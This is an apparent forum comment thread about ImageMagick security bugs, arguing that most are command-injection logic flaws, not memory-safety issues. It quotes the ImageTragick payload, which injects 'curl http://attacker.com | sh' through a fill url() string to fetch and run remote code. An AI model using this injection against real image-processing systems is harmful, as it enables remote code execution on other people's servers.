3 ms·
Many of the imagemagick bugs (in fact, most imagemagick bugs I remember as a former CTF player) are a logic bugs, where external program was invoked with improp
by msm_ 14d ago
Many of the imagemagick bugs (in fact, most imagemagick bugs I remember as a former CTF player) are a logic bugs, where external program was invoked with improper sanitisation. Rewriting the code into a memory safe language is not a panacea and would not help.
Famously, ImageTragick was just "fill 'url(https://example.com https://example.com"; curl http://attacker.com http://attacker.com | sh ")'"
- walrus01 14d agoThat's a very good point. I've had moderately good success with even not very smart LLMs 'fixing' things that would otherwise accept arbitrary user generated text input, to run things through a thorough sanitization pipeline, the actual code for a sanitizer is not very complex at all.